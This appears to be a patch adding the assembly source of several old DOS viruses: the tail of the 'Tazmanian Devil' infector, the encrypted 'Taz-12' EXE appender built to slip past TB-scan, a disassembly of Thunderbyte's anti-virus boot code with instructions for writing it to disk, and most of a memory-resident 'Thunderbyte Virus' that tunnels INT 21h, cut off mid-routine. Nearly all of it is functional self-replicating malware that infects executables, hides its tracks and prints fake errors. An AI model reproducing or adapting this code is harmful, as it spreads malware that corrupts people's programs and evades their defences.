virus_msg21 db cr,lf,"AÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßßADH ADH ADH ADHßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ ADH ADH ADH$"
|
||||
virus_msg22 db cr,lf,"ADßß ßÛÛÛÛÛßßßßßßDH ADH ADH ADH ADH ADH ADßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ ADH ADH ADH$"
|
||||
virus_msg23 db cr,lf,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector$"
|
||||
compare_buf db 20 dup (?) ; Buffer to compare files in
|
||||
files_found db ?
|
||||
files_infected db ?
|
||||
orig_time dw ?
|
||||
orig_date dw ?
|
||||
orig_attr dw ?
|
||||
handle dw ?
|
||||
success db ?
|
||||
|
||||
random_mutation: ; First decide if virus is to mutate
|
||||
mov ah,2ch ; Set up DOS function to get time
|
||||
int 21h
|
||||
cmp encrypt_val,0 ; Is this a first-run virus copy?
|
||||
je install_val ; If so, install whatever you get.
|
||||
cmp dh,15 ; Is it less than 16 seconds?
|
||||
jg find_extension ; If not, don't mutate this time
|
||||
install_val:
|
||||
cmp dl,0 ; Will we be encrypting using zero?
|
||||
je random_mutation ; If so, get a new value.
|
||||
mov encrypt_val,dl ; Otherwise, save the new value
|
||||
find_extension: ; Locate file w/ valid extension
|
||||
mov files_found,0 ; Count infected files found
|
||||
mov files_infected,4 ; BX counts file infected so far
|
||||
mov success,0
|
||||
find_exe:
|
||||
mov cx,00100111b ; Look for all flat file attributes
|
||||
mov dx,offset exe_filespec ; Check for .EXE extension first
|
||||
mov ah,4eh ; Call DOS find first service
|
||||
int 21h
|
||||
cmp ax,12h ; Are no files found?
|
||||
je find_com ; If not, nothing more to do
|
||||
call find_healthy ; Otherwise, try to find healthy .EXE
|
||||
find_com:
|
||||
mov cx,00100111b ; Look for all flat file attributes
|
||||
mov dx,offset com_filespec ; Check for .COM extension now
|
||||
mov ah,4eh ; Call DOS find first service
|
||||
int 21h
|
||||
cmp ax,12h ; Are no files found?
|
||||
je chdir ; If not, step back a directory
|
||||
call find_healthy ; Otherwise, try to find healthy .COM
|
||||
chdir: ; Routine to step back one level
|
||||
mov dx,offset newdir ; Load DX with address of pathname
|
||||
mov ah,3bh ; Change directory DOS service
|
||||
int 21h
|
||||
dec files_infected ; This counts as infecting a file
|
||||
jnz find_exe ; If we're still rolling, find another
|
||||
jmp exit_virus ; Otherwise let's pack it up
|
||||
find_healthy:
|
||||
mov bx,dta ; Point BX to address of DTA
|
||||
mov ax,[bx]+attribute ; Get the current file's attribute
|
||||
mov orig_attr,ax ; Save it
|
||||
mov ax,[bx]+timestamp ; Get the current file's time stamp
|
||||
mov orig_time,ax ; Save it
|
||||
mov ax,[bx]+datestamp ; Get the current file's data stamp
|
||||
mov orig_date,ax ; Save it
|
||||
mov dx,dta+filename ; Get the filename to change attribute
|
||||
mov cx,0 ; Clear all attribute bytes
|
||||
mov al,1 ; Set attribute sub-function
|
||||
mov ah,43h ; Call DOS service to do it
|
||||
int 21h
|
||||
mov al,2 ; Set up to open handle for read/write
|
||||
mov ah,3dh ; Open file handle DOS service
|
||||
int 21h
|
||||
mov handle,ax ; Save the file handle
|
||||
mov bx,ax ; Transfer the handle to BX for read
|
||||
mov cx,20 ; Read in the top 20 bytes of file
|
||||
mov dx,offset compare_buf ; Use the small buffer up top
|
||||
mov ah,3fh ; DOS read-from-handle service
|
||||
int 21h
|
||||
mov bx,offset compare_buf ; Adjust the encryption value
|
||||
mov ah,encrypt_val ; for accurate comparison
|
||||
mov [bx+6],ah
|
||||
mov si,code_start ; One array to compare is this file
|
||||
mov di,offset compare_buf ; The other array is the buffer
|
||||
mov ax,ds ; Transfer the DS register...
|
||||
mov es,ax ; ...to the ES register
|
||||
cld
|
||||
repe cmpsb ; Compare the buffer to the virus
|
||||
jne healthy ; If different, the file is healthy!
|
||||
call close_file ; Close it up otherwise
|
||||
inc files_found ; Chalk up another fucked up file
|
||||
continue_search:
|
||||
mov ah,4fh ; Find next DOS function
|
||||
int 21h ; Try to find another same type file
|
||||
cmp ax,12h ; Are there any more files?
|
||||
je no_more_found ; If not, get outta here
|
||||
jmp find_healthy ; If so, try the process on this one!
|
||||
no_more_found:
|
||||
ret ; Go back to where we came from
|
||||
healthy:
|
||||
mov bx,handle ; Get the file handle
|
||||
mov ah,3eh ; Close it for now
|
||||
int 21h
|
||||
mov ah,3dh ; Open it again, to reset it
|
||||
mov dx,dta+filename
|
||||
mov al,2
|
||||
int 21h
|
||||
mov handle,ax ; Save the handle again
|
||||
call infect_file ; Infect the healthy file
|
||||
call close_file ; Close down this operation
|
||||
inc success ; Indicate we did something this time
|
||||
dec files_infected ; Scratch off another file on agenda
|
||||
jz exit_virus ; If we're through, terminate
|
||||
jmp continue_search ; Otherwise, try another
|
||||
ret
|
||||
close_file:
|
||||
mov bx,handle ; Get the file handle off the stack
|
||||
mov cx,orig_time ; Get the date stamp
|
||||
mov dx,orig_date ; Get the time stamp
|
||||
mov al,1 ; Set file date/time sub-service
|
||||
mov ah,57h ; Get/Set file date and time service
|
||||
int 21h ; Call DOS
|
||||
mov bx,handle
|
||||
mov ah,3eh ; Close handle DOS service
|
||||
int 21h
|
||||
mov cx,orig_attr ; Get the file's original attribute
|
||||
mov al,1 ; Instruct DOS to put it back there
|
||||
mov dx,dta+filename ; Feed it the filename
|
||||
mov ah,43h ; Call DOS
|
||||
int 21h
|
||||
ret
|
||||
exit_virus:
|
||||
cmp files_found,2 ; Are at least 6 files infected?
|
||||
jl print_fake ; If not, keep a low profile
|
||||
cmp success,0 ; Did we infect anything?
|
||||
jg print_fake ; If so, cover it up
|
||||
mov ah,09h ; Use DOS print string service
|
||||
mov dx,offset virus_msg1 ; Load the address of the first line
|
||||
int 21h ; Print it
|
||||
mov dx,offset virus_msg2 ; Load the second line
|
||||
int 21h ; (etc)
|
||||
mov dx,offset virus_msg3
|
||||
int 21h
|
||||
mov dx,offset virus_msg4
|
||||
int 21h
|
||||
mov dx,offset virus_msg5
|
||||
int 21h
|
||||
mov dx,offset virus_msg6
|
||||
int 21h
|
||||
mov dx,offset virus_msg7
|
||||
int 21h
|
||||
mov dx,offset virus_msg8
|
||||
int 21h
|
||||
mov dx,offset virus_msg9
|
||||
int 21h
|
||||
mov dx,offset virus_msg10
|
||||
int 21h
|
||||
mov dx,offset virus_msg11
|
||||
int 21h
|
||||
mov dx,offset virus_msg12
|
||||
int 21h
|
||||
mov dx,offset virus_msg13
|
||||
int 21h
|
||||
mov dx,offset virus_msg14
|
||||
int 21h
|
||||
mov dx,offset virus_msg15
|
||||
int 21h
|
||||
mov dx,offset virus_msg16
|
||||
int 21h
|
||||
mov dx,offset virus_msg17
|
||||
int 21h
|
||||
mov dx,offset virus_msg18
|
||||
int 21h
|
||||
mov dx,offset virus_msg19
|
||||
int 21h
|
||||
mov dx,offset virus_msg20
|
||||
int 21h
|
||||
mov dx,offset virus_msg21
|
||||
int 21h
|
||||
mov dx,offset virus_msg22
|
||||
int 21h
|
||||
mov dx,offset virus_msg23
|
||||
int 21h
|
||||
jmp terminate
|
||||
print_fake:
|
||||
mov ah,09h ; Use DOS to print fake error message
|
||||
mov dx,offset fake_msg
|
||||
int 21h
|
||||
terminate:
|
||||
mov ah,4ch ; DOS terminate process function
|
||||
int 21h ; Call DOS to get out of this program
|
||||
|
||||
filler db 8 dup (90h) ; Pad out the file length to 666 bytes
|
||||
|
||||
main endp
|
||||
code ends
|
||||
end main
|
|
@ -0,0 +1,252 @@
|
|||
cseg segment byte public 'code'
|
||||
assume cs:cseg, ds:cseg
|
||||
|
||||
org 100h
|
||||
|
||||
start_of_virus:
|
||||
|
||||
call get_offset
|
||||
get_offset: ;alternative way to get the delta
|
||||
mov di,sp ;offset without activating any flags in
|
||||
mov bp,word ptr ss:[di] ;TB-scan
|
||||
sub bp,offset get_offset
|
||||
inc sp
|
||||
inc sp
|
||||
|
||||
push ds ;save es & ds
|
||||
push es
|
||||
push cs ;and point ds to code segment
|
||||
pop ds
|
||||
|
||||
call encrypt_decrypt ;decrypt contents of file
|
||||
|
||||
start_of_encryption:
|
||||
cld ;clear direction flag
|
||||
|
||||
mov ah,1ah ;set new dta area
|
||||
lea dx,[bp+dta_area]
|
||||
int 21h
|
||||
|
||||
mov bx,es
|
||||
push cs ;es points to code segment
|
||||
pop es
|
||||
|
||||
lea si,[bp+return2_buffer] ;this code prepares the return code
|
||||
lea di,[bp+return_buffer]
|
||||
movsw ;transfer buffer contents
|
||||
lodsw
|
||||
add ax,bx ;bx holds start es = psp
|
||||
add ax,10h
|
||||
stosw
|
||||
|
||||
; lea di,[bp+stack_return]
|
||||
; lea si,[bp+stack_save] ;si already points to stack_save
|
||||
add di,8 ;saving a byte with this code
|
||||
lodsw ;prepares the restore of ss/sp
|
||||
add ax,bx
|
||||
add ax,10h
|
||||
stosw
|
||||
movsw
|
||||
|
||||
|
||||
mov ah,47h ;save starting directory
|
||||
xor dl,dl
|
||||
lea si,[bp+save_dir]
|
||||
int 21h
|
||||
|
||||
find_new_files: ;start finding files
|
||||
mov ah,4eh
|
||||
mov cx,7
|
||||
lea dx,[bp+search_pattern]
|
||||
find_files:
|
||||
int 21h
|
||||
|
||||
jnc open_file ;if found a file
|
||||
lea dx,[bp+dir_mask] ;else change directory
|
||||
mov ah,3bh
|
||||
int 21h
|
||||
jnc find_new_files
|
||||
jmp no_more_files ;end of all files
|
||||
|
||||
open_file: ;open the found file
|
||||
mov ax,3d02h
|
||||
lea dx,[bp+dta_area+1eh]
|
||||
int 21h
|
||||
|
||||
xchg ax,bx ;file handle in bx
|
||||
|
||||
mov ah,3fh ;read the exe header to exe_header
|
||||
mov cx,18h
|
||||
lea dx,[bp+exe_header]
|
||||
int 21h
|
||||
|
||||
lea si,[bp+exe_header] ;check if it's really a executable
|
||||
lodsw
|
||||
cmp ax,'ZM'
|
||||
je check_infected
|
||||
cmp ax,'MZ'
|
||||
je check_infected
|
||||
jmp no_exe ;else jump
|
||||
|
||||
check_infected:
|
||||
|
||||
add si,10h ;saving another byte
|
||||
; lea si,[bp+exe_header+12h]
|
||||
lodsw
|
||||
cmp ax,'Ri' ;is it already infected?
|
||||
jne start_infect
|
||||
jmp already_infected
|
||||
|
||||
|
||||
start_infect:
|
||||
lea di,[bp+return2_buffer] ;put the files ip/cs in return2_buffer
|
||||
movsw
|
||||
movsw
|
||||
|
||||
lea si,[bp+exe_header+0eh] ;save the files ss/sp in stack_save
|
||||
movsw
|
||||
movsw
|
||||
|
||||
lea di,[bp+exe_header+12h] ;mark the file infected
|
||||
mov ax,'Ri'
|
||||
stosw
|
||||
|
||||
mov al,2 ;go to end_of_file
|
||||
call go_eof ;dx/ax is file length at return
|
||||
|
||||
mov cx,10h ;use div to save bytes instead of speed
|
||||
div cx
|
||||
sub ax,word ptr ds:[bp+exe_header+8]
|
||||
xchg dx,ax
|
||||
stosw ;put new ip/cs in exe_header
|
||||
xchg dx,ax
|
||||
stosw
|
||||
|
||||
inc ax ;put new suitable ss/sp in exe_header
|
||||
inc ax
|
||||
mov word ptr [bp+exe_header+0eh],ax
|
||||
mov word ptr [bp+exe_header+10h],4b0h
|
||||
|
||||
|
||||
mov ah,2ch ;get system time for random number
|
||||
int 21h
|
||||
xor dh,dh ;just alter the code a little bit
|
||||
or dl,00001010b ;with encryption so TB-scan wont't
|
||||
mov word ptr [bp+encryption_value],dx ;find garbage instruction
|
||||
|
||||
mov ah,40h ;prepare to append virus to file
|
||||
lea dx,[bp+start_of_virus]
|
||||
call append_virus ;call it
|
||||
|
||||
mov al,2 ;go to end of file
|
||||
call go_eof
|
||||
|
||||
mov cx,512 ;get filesize in 512 modules
|
||||
div cx
|
||||
inc ax
|
||||
mov word ptr [bp+exe_header+2],dx ;put modulo/filesize in
|
||||
mov word ptr [bp+exe_header+4],ax ;exe header
|
||||
|
||||
|
||||
xor al,al ;go to beginning of file
|
||||
call go_eof
|
||||
|
||||
mov ah,40h ;write new exe header
|
||||
mov cx,18h
|
||||
lea dx,[bp+exe_header]
|
||||
int 21h
|
||||
|
||||
lea si,[bp+dta_area+16h] ;restore time/date stamp
|
||||
mov cx,word ptr [si]
|
||||
mov dx,word ptr [si+2]
|
||||
mov ax,5701h
|
||||
int 21h
|
||||
|
||||
already_infected:
|
||||
no_exe:
|
||||
|
||||
mov ah,3eh ;close file
|
||||
int 21h
|
||||
|
||||
mov ax,4301h ;restore file attribute
|
||||
mov cl,byte ptr [bp+dta_area+15h]
|
||||
lea dx,[bp+dta_area+1eh]
|
||||
int 21h
|
||||
|
||||
mov ah,4fh ;find next file
|
||||
jmp find_files
|
||||
|
||||
no_more_files:
|
||||
|
||||
lea dx,[bp+save_dir] ;restore starting directory
|
||||
mov ah,3bh
|
||||
int 21h
|
||||
|
||||
pop es ;shrink memory block
|
||||
mov ah,4ah
|
||||
mov bx,10000
|
||||
int 21h
|
||||
push es
|
||||
|
||||
mov ah,48h ;allocate a new 3k block
|
||||
mov bx,192
|
||||
int 21h
|
||||
jc no_mem
|
||||
dec ax
|
||||
mov es,ax
|
||||
mov word ptr es:[1],0008h ;mark DOS as owner and it will
|
||||
no_mem: ;reduce available memory to DOS
|
||||
|
||||
pop es ;restore old es/ds
|
||||
pop ds
|
||||
|
||||
cli ;must use this before altering ss/sp
|
||||
mov ss,word ptr cs:[bp+stack_return] ;put back original ss/sp
|
||||
mov sp,word ptr cs:[bp+stack_return+2]
|
||||
sti ;interrupts allowed again
|
||||
|
||||
end_part:
|
||||
db 0eah ;jmp to original ip
|
||||
return_buffer db 0,0,0,0
|
||||
return2_buffer dw 0,0fff0h ;code for carrier file to exit
|
||||
stack_save dd ?
|
||||
stack_return dd ?
|
||||
dir_mask db '..',0
|
||||
search_pattern db '*.exe',0
|
||||
signature db "Taz-12 (C) 94 by Sector Infector!"
|
||||
go_eof: ;procedure to go to beginning and
|
||||
mov ah,42h ;end of file
|
||||
xor cx,cx ;this saves a few bytes as it's
|
||||
cwd ;used a few times
|
||||
int 21h
|
||||
ret
|
||||
end_of_encryption:
|
||||
pad db 0 ;pad out a byte so first byte of
|
||||
;encryption value won't be overwritten
|
||||
encryption_value dw 0
|
||||
|
||||
encrypt_decrypt: ;cryptation routine
|
||||
mov si,word ptr [bp+encryption_value]
|
||||
lea di,[bp+start_of_encryption]
|
||||
mov cx,(end_of_encryption-start_of_encryption+1)/2
|
||||
crypt_loop:
|
||||
xor word ptr [di],si
|
||||
inc di
|
||||
inc di
|
||||
loop crypt_loop
|
||||
ret
|
||||
|
||||
append_virus:
|
||||
call encrypt_decrypt ;encrypt virus before write
|
||||
mov cx,end_of_virus-start_of_virus ;cx is length of virus
|
||||
int 21h ;call 40h
|
||||
call encrypt_decrypt ;decrypt virus again
|
||||
ret
|
||||
end_of_virus:
|
||||
exe_header db 18h dup(?) ;don't need to copy this shit
|
||||
dta_area db 43 dup(?) ;to the next file to infect
|
||||
save_dir db 64 dup(?) ;return adress is already saved!
|
||||
cseg ends
|
||||
end start_of_virus
|
||||
|
||||
|
|
@ -0,0 +1,171 @@
|
|||
;This is a disassembly of Thunderbyte's anti-viral partition code.
|
||||
;An org statement was not used because it appears that all offsets used
|
||||
;herein are either relative or absolute, i.e. it just doesn't matter.
|
||||
;This should be compiled as a binary image file, it *WILL NOT* create
|
||||
;an executable file. This code is exactly 512 bytes long and should be
|
||||
;implanted into the hard drive at physical sector 1, cylinder 0, head 0
|
||||
;using the BIOS direct write to disk function. *DO NOT* use DOS write to
|
||||
;disk functions or DEBUG because these functions can't access hidden sectors
|
||||
;and you'll probably just overwrite the disk drive.
|
||||
|
||||
;have fun, folks!
|
||||
|
||||
code_start:
|
||||
|
||||
cli ;no interrupts
|
||||
xor cx, cx
|
||||
mov ss, cx
|
||||
mov sp, 7c00h
|
||||
mov si, sp
|
||||
sti
|
||||
cld
|
||||
|
||||
mov es, cx ;cs already equals 0
|
||||
mov ds, cx
|
||||
|
||||
mov di, 0600h ;
|
||||
|
||||
mov ch, 01 ;cx = 100h
|
||||
repz movsw ;mov 200h bytes from 0000:7c00h to 0000:0600h
|
||||
;to make room for boot sector
|
||||
|
||||
jump_pt db 0e9h, 00, 8ah ;this will act like far jmp to first_pt label
|
||||
;i.e. 0000:061ah, wraps around segment
|
||||
first_pt: ;when execution continues, this will be offset
|
||||
;061ah here
|
||||
mov si, 06ddh
|
||||
call routine_1
|
||||
mov si, 07eeh
|
||||
call routine_2
|
||||
mov bp, si
|
||||
mov si, 0733h
|
||||
jb second_pt
|
||||
|
||||
mov bx, sp ;buffer at stack pointer (7c00h?)
|
||||
mov ax, 0201h ;func 2, 1 sector - possibily boot sector?
|
||||
int 13h ;BIOS read sector
|
||||
|
||||
mov si, 0725h
|
||||
second_pt:
|
||||
jb sixth_pt
|
||||
|
||||
mov si, 745h
|
||||
call routine_1
|
||||
call routine_1
|
||||
|
||||
mov si, 7c40h
|
||||
mov cx, 01c0h
|
||||
loop_1:
|
||||
xchg ax, bx
|
||||
shl bx, 1
|
||||
lodsb ;from 0000:7c40h
|
||||
add ax, bx
|
||||
mov ah, bh
|
||||
test ah, ah
|
||||
jns third_pt
|
||||
xor ax, 0a097h
|
||||
third_pt:
|
||||
loop loop_1
|
||||
|
||||
cmp ax, 7805h
|
||||
jnz fourth_pt
|
||||
mov si, 0740h
|
||||
call routine_1
|
||||
|
||||
mov si, 0762h
|
||||
call 01cdh
|
||||
mov dx, [si + 0fc9fh]
|
||||
cmp dx, 27eh
|
||||
jb fourth_pt
|
||||
|
||||
mov si, 740h
|
||||
call routine_1
|
||||
mov si, 774h
|
||||
call routine_1
|
||||
|
||||
les ax, [004c]
|
||||
mov bx, es
|
||||
mov cl, 04
|
||||
shr ax, cl
|
||||
add ax, bx
|
||||
inc cx
|
||||
inc cx
|
||||
shl dx, cl
|
||||
cmp ax, dx
|
||||
jnb fifth_pt
|
||||
|
||||
fourth_pt:
|
||||
mov si, 0787h
|
||||
call routine_1
|
||||
int 16h
|
||||
mov si, 783h
|
||||
or al, 20h
|
||||
cmp al, 79h
|
||||
jnz seventh_pt
|
||||
|
||||
fifth_pt:
|
||||
call routine_1
|
||||
mov si, bp
|
||||
mov dx, [si]
|
||||
jmp sp ;control goes to boot sector
|
||||
|
||||
sixth_pt:
|
||||
call routine_1
|
||||
int 16h
|
||||
|
||||
seventh_pt:
|
||||
int 18h ;rom BASIC!
|
||||
|
||||
eighth_pt:
|
||||
jmp eighth_pt ;infinite loop Lock Up!
|
||||
|
||||
|
||||
routine_2:
|
||||
lea di, [si - 30h]
|
||||
boot_chk:
|
||||
cmp byte ptr [si], 80h ;looks like check for bootable parttn
|
||||
jz bootable
|
||||
sub si, 10h
|
||||
cmp si, di
|
||||
jnb boot_chk
|
||||
ret
|
||||
bootable:
|
||||
mov dx, [si]
|
||||
mov cx, [si + 2]
|
||||
return_pt:
|
||||
ret
|
||||
|
||||
routine_1:
|
||||
lodsb
|
||||
cbw ;convert to word
|
||||
test ax, ax ;huh?
|
||||
jz return_pt ;like ret to original caller
|
||||
|
||||
mov ah, 0eh
|
||||
xor bx, bx
|
||||
push si
|
||||
int 10h
|
||||
pop si
|
||||
jmp routine_1
|
||||
|
||||
code_end:
|
||||
|
||||
msg1 db 13, 10, "Thunderbyte anti-virus partition "
|
||||
db "v6.24 (C) 1993-94 Thunderbyte BV.", 13, 10, 10, 0
|
||||
msg2 db "Disk error!", 13, 10, 00
|
||||
msg3 db "No system!", 13, 10, 00
|
||||
msg4 db "OK!", 13, 10,"Checking ",0
|
||||
msg5 db "bootsector CRC -> ",0
|
||||
msg6 db "available RAM -> ",0
|
||||
msg7 db "INT 13h -> ",0
|
||||
msg8 db "OK!",13, 10, 10, 0
|
||||
msg9 db "Failed!", 13, 10, "System might be infected. Continue? (N/Y)", 07, 0
|
||||
|
||||
misc db 0, 0, 0, 80h, 01h, 01, 0, 06, 0dh, 0feh, 0f8h
|
||||
db 03eh, 0, 0, 0, 06h, 78h, 0dh, 0, 0, 0
|
||||
db 10h dup(0)
|
||||
db 10h dup(0)
|
||||
db 0eh dup(0)
|
||||
|
||||
id_sig db 55h, 0aah
|
||||
|
|
@ -0,0 +1,612 @@
|
|||
;*****************************************************************************;
|
||||
; ;
|
||||
; Tunderbyte Virus ;
|
||||
; ;
|
||||
; TBSCAN.DAT : DB3F00807609??4D75F9 ;
|
||||
; ;
|
||||
;*****************************************************************************;
|
||||
|
||||
virus segment public 'code'
|
||||
assume cs:virus, ds:virus, es:virus
|
||||
org 0
|
||||
|
||||
VirusStart equ $
|
||||
VirusSize1 equ (VirusEnd1-$)
|
||||
VirusSize2 equ (VirusEnd2-$)
|
||||
|
||||
Decrypt1: db 0bdh,StartEncrypt-Decrypt2,0
|
||||
db 80h,76h,Decrypt2-VirusStart-1,0
|
||||
db 4dh,75h,-7
|
||||
Decrypt2: cli
|
||||
mov sp,offset DoAgain-2
|
||||
ret -8
|
||||
|
||||
db 0,0,0,0,'***** THUNDERBYTE *****',0,0,0,0
|
||||
|
||||
Init: mov cx,(VirusEnd1-StartEncrypt+1)/2
|
||||
mov dl,byte ptr cs:Decrypt1[6]
|
||||
mov dh,dl
|
||||
mov si,offset StartEncrypt
|
||||
NotReady: ret 2
|
||||
|
||||
DecryptWord: mov ax,ss:[si]
|
||||
xor cs:[si],dx
|
||||
NextWord: add dx,ax
|
||||
inc si
|
||||
ret -4
|
||||
|
||||
dw DecryptWord
|
||||
dw DoAgain
|
||||
dw NextWord
|
||||
dw Init
|
||||
DoAgain: loop NotReady
|
||||
|
||||
StartEncrypt equ $
|
||||
|
||||
Main: mov sp,1000h
|
||||
sti
|
||||
push ds
|
||||
push es
|
||||
mov ax,03031h
|
||||
mov bx,0DEADh
|
||||
int 21h
|
||||
cmp ax,0DEADh
|
||||
jne Install
|
||||
jmp Exit
|
||||
Install: push es
|
||||
mov ah,52h
|
||||
int 21h
|
||||
mov ax,es:[bx-2]
|
||||
mov cs:FirstMCB,ax
|
||||
pop es
|
||||
CheckBlock: mov ds,ax
|
||||
inc ax
|
||||
cmp word ptr ds:[1],ax
|
||||
jne NextBlock
|
||||
cmp word ptr ds:[3],((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
|
||||
jne NextBlock
|
||||
push ax
|
||||
push es
|
||||
mov cx,VirusSize2
|
||||
xor di,di
|
||||
mov es,ax
|
||||
mov al,es:[di]
|
||||
cld
|
||||
repe scasb
|
||||
pop es
|
||||
pop ax
|
||||
je CopyVirus
|
||||
NextBlock: add ax,ds:[3]
|
||||
cmp byte ptr ds:[0],'Z'
|
||||
jne CheckBlock
|
||||
mov ah,4ah
|
||||
mov bx,-1
|
||||
int 21h
|
||||
mov ah,4ah
|
||||
sub bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)+1
|
||||
int 21h
|
||||
mov ah,48h
|
||||
mov bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
|
||||
int 21h
|
||||
CopyVirus: push cs
|
||||
pop ds
|
||||
dec ax
|
||||
mov es,ax
|
||||
inc ax
|
||||
mov es:[1],ax
|
||||
mov cx,8
|
||||
mov si,offset CommandStr
|
||||
mov di,cx
|
||||
cld
|
||||
rep movsb
|
||||
mov es,ax
|
||||
EncryptZero: inc byte ptr ds:Decrypt1[6]
|
||||
jz EncryptZero
|
||||
mov cx,VirusSize2
|
||||
xor si,si
|
||||
xor di,di
|
||||
cld
|
||||
rep movsb
|
||||
push es
|
||||
call ReturnFar
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
cli
|
||||
mov ax,offset DebugWatch
|
||||
xchg ax,ds:[20h]
|
||||
mov cs:OldInt8o,ax
|
||||
mov ax,cs
|
||||
xchg ax,ds:[22h]
|
||||
mov cs:OldInt8s,ax
|
||||
sti
|
||||
push ds:[4]
|
||||
push ds:[6]
|
||||
mov word ptr ds:[4],offset Trace1
|
||||
mov word ptr ds:[6],cs
|
||||
pushf
|
||||
push cs
|
||||
mov ax,offset Return4
|
||||
push ax
|
||||
cli
|
||||
pushf
|
||||
pop ax
|
||||
or ax,100h
|
||||
push ax
|
||||
push ds:[86h]
|
||||
push ds:[84h]
|
||||
mov ah,52h
|
||||
Trace1: push bp
|
||||
mov bp,sp
|
||||
push ax
|
||||
push ds
|
||||
push cs
|
||||
pop ds
|
||||
mov ax,FirstMCB
|
||||
cmp [bp+4],ax
|
||||
jae Return1
|
||||
mov ax,[bp-2]
|
||||
mov RegAX,ax
|
||||
mov RegSP,bp
|
||||
mov ax,[bp+2]
|
||||
mov OldInt21o,ax
|
||||
mov ax,[bp+4]
|
||||
mov OldInt21s,ax
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
mov word ptr ds:[4],offset Trace2
|
||||
mov word ptr ds:[6],cs
|
||||
jmp short Trace3
|
||||
Return1: jmp short Return3
|
||||
Trace2: push bp
|
||||
mov bp,sp
|
||||
push ax
|
||||
push ds
|
||||
cmp ax,cs:RegAX
|
||||
jne Return3
|
||||
cmp bp,cs:RegSP
|
||||
jne Return3
|
||||
Trace3: push bx
|
||||
push dx
|
||||
lds bx,[bp+2]
|
||||
mov al,[bx]
|
||||
mov dx,[bx+1]
|
||||
inc dx
|
||||
cmp al,0e9h
|
||||
je JumpOpcode
|
||||
cmp al,0e8h
|
||||
je CallOpcode
|
||||
xchg ax,dx
|
||||
dec ax
|
||||
cbw
|
||||
xchg ax,dx
|
||||
cmp al,0ebh
|
||||
je JumpOpcode
|
||||
cmp al,70h
|
||||
jb Return2
|
||||
cmp al,7fh
|
||||
ja Return2
|
||||
JumpOpcode: push ax
|
||||
push ds
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
mov word ptr ds:[0c8h],offset HackJump
|
||||
mov word ptr ds:[0cah],cs
|
||||
jmp short Continue
|
||||
CallOpcode: push ax
|
||||
push ds
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
mov word ptr ds:[0c8h],offset HackCall
|
||||
mov word ptr ds:[0cah],cs
|
||||
Continue: pop ds
|
||||
pop ax
|
||||
mov cs:Displacement,dx
|
||||
mov cs:Opcode,al
|
||||
mov ax,32cdh
|
||||
xchg ax,[bx]
|
||||
mov cs:SavedCode,ax
|
||||
mov cs:HackOffset,bx
|
||||
mov cs:HackSegment,ds
|
||||
and word ptr [bp+6],0feffh
|
||||
Return2: pop dx
|
||||
pop bx
|
||||
Return3: pop ds
|
||||
pop ax
|
||||
pop bp
|
||||
iret
|
||||
Return4: pop ds:[6]
|
||||
pop ds:[4]
|
||||
mov cs:Handle,0
|
||||
Exit: pop es
|
||||
pop ds
|
||||
mov ax,ds
|
||||
add ax,10h
|
||||
add cs:OldCS,ax
|
||||
add ax,cs:OldSP
|
||||
mov dx,cs:OldSP
|
||||
cli
|
||||
mov ss,ax
|
||||
mov sp,dx
|
||||
sti
|
||||
jmp cs:OldEntry
|
||||
|
||||
ReturnFar: retf
|
||||
|
||||
OldEntry equ this dword
|
||||
OldIP dw 0
|
||||
OldCS dw -10h
|
||||
OldSP dw 1000h
|
||||
OldSS dw 0
|
||||
|
||||
HackAddress equ this dword
|
||||
HackOffset dw ?
|
||||
HackSegment dw ?
|
||||
SavedCode dw ?
|
||||
|
||||
HackJump: call Interrupt21
|
||||
push bp ; simulate a conditional or
|
||||
push ax ; unconditional jump
|
||||
mov bp,sp
|
||||
mov ax,[bp+8]
|
||||
and ax,0fcffh
|
||||
push ax
|
||||
db 0b8h ; mov ax,????
|
||||
Displacement dw 0
|
||||
popf
|
||||
Opcode db 0ebh,3,0 ; j?? +3
|
||||
xor ax,ax
|
||||
nop
|
||||
add [bp+4],ax
|
||||
pop ax
|
||||
pop bp
|
||||
iret
|
||||
|
||||
HackCall: call Interrupt21
|
||||
sub sp,2 ; simulate a call
|
||||
push bp
|
||||
mov bp,sp
|
||||
push ax
|
||||
mov ax,[bp+4]
|
||||
inc ax
|
||||
xchg ax,[bp+8]
|
||||
xchg ax,[bp+6]
|
||||
xchg ax,[bp+4]
|
||||
add ax,cs:Displacement
|
||||
mov [bp+2],ax
|
||||
pop ax
|
||||
pop bp
|
||||
iret
|
||||
|
||||
Seek: mov ah,42h
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
|
||||
Dos: pushf
|
||||
db 9ah
|
||||
OldInt21o dw ?
|
||||
OldInt21s dw ?
|
||||
ret
|
||||
|
||||
DosVersion: cmp ax,3031h
|
||||
jne NotTByte
|
||||
cmp bx,0DEADh
|
||||
jne NotTByte
|
||||
mov ax,0DEADh
|
||||
add sp,8
|
||||
iret
|
||||
|
||||
Interrupt21: cmp ah,30h
|
||||
je DosVersion
|
||||
push si
|
||||
push ds
|
||||
push cs:SavedCode
|
||||
lds si,cs:HackAddress
|
||||
pop ds:[si]
|
||||
pop ds
|
||||
pop si
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push bp
|
||||
push ds
|
||||
push es
|
||||
cmp ah,3eh
|
||||
je CloseFile
|
||||
cmp ah,40h
|
||||
je WriteFile
|
||||
Old21: pop es
|
||||
pop ds
|
||||
pop bp
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
push si
|
||||
push ds
|
||||
lds si,cs:HackAddress
|
||||
mov word ptr ds:[si],32cdh
|
||||
pop ds
|
||||
pop si
|
||||
NotTByte: ret
|
||||
|
||||
WriteFile: mov ax,4400h
|
||||
call Dos
|
||||
cmp dl,7fh
|
||||
ja Error1
|
||||
mov al,1
|
||||
call Seek
|
||||
jc Error1
|
||||
or dx,dx
|
||||
jnz Error1
|
||||
cmp ax,17h
